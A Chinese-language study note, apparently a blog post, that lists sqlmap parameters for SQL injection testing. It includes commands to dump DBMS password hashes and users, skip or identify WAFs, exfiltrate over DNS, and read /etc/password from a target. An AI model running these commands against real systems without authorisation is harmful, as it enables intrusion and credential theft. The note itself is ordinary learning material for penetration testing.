0324-SQLMAP使用参数备注

此文说明:

此文仅为自己学习记录使用,督促自己学习,如有侵犯,请联系,歉删!


一.sqlmap 使用的参数记录

  1.1 --technique --technique=BEU

  B: Boolean-based blind SQL injection(布尔型注入)
  E: Error-based SQL injection(报错型注入)
  U: UNION query SQL injection(可联合查询注入)
  S: Stacked queries SQL injection(可多语句查询注入)
  T: Time-based blind SQL injection(基于时间延迟注入)

  1.2  --random-agent

从./txt/user-angent.txt中随记获取

  1.3--level 3  1-5,默认为1

  参数且数值>=2的时候也会检查cookie时面的参数

  当>=3的时候将检查User-agent和Referer

  

  当level参数设置为3或者3以上,就尝试对user-angent进行注入

  risk=RISK 执行测试的风险(0-3,默认为1)

  1.4--proxy代理是格式为:http://url:port http://127.0.0.1:8080 代理和bp一起使用
  1.5当HTTP(S)代理需要认证是可以使用--proxy-cred参数:username:password。
  1.6--ignore-proxy拒绝使用本地局域网的HTTP(S)代理。

  1.7 --delay 默认没有延时,设置之后的时间是0.5s

  1.8--safe-url 设置sqlmap要访问的正常url 可以设置为此系统的一个正常访问界面
    --safe-freq 设置每测试多少条注入语句后才去访问safe-url

  1.9--identify-waf
    sqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。

   1.10--check-waf
    WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰,如果怀疑目标有此防护的话,可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试

  1.11--dns-domain=abc.xyz
    python sqlmap.py -r abc.txt --skip-waf --random-agent --dns-domain=abc.xyz --dbs

  1.12

  –is-dba 检测DBMS当前用户是否DBA

  –users 枚举数据库管理系统用户

  –passwords 枚举数据库管理系统用户密码哈希
  –privileges 枚举数据库管理系统用户的权限
  –roles 枚举数据库管理系统用户的角色
  –dbs 枚举数据库管理系统数据库
  –tables 枚举的DBMS数据库中的表

  1.13--hex
  有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:

   1.14--roles

  当前用户有权限读取包含所有用户的表的权限时,很可能列举出每个用户的角色,也可以用-U参数指定你想看哪个用户的角色。
  仅适用于当前数据库是Oracle的时候

  1.15 sqlmap.py-m tg.txt tg.txt跟sqlmap在同一个目录下。

    批量对get 链接进行注入检查

  1.16salmap直接链接数据库

  sqlmap.py -d”mysql://admin:admin@192.168.21.17:3306/testdb” -f –banner –dbs–users

  1.17读取linux下的文件

  sqlmap.py-u “url” –file /etc/password

链接:https://www.cnblogs.com/hongfei/p/3872156.html

fW:20200325

就是现在,干!
原文地址:https://www.cnblogs.com/L6y1a/p/12562642.html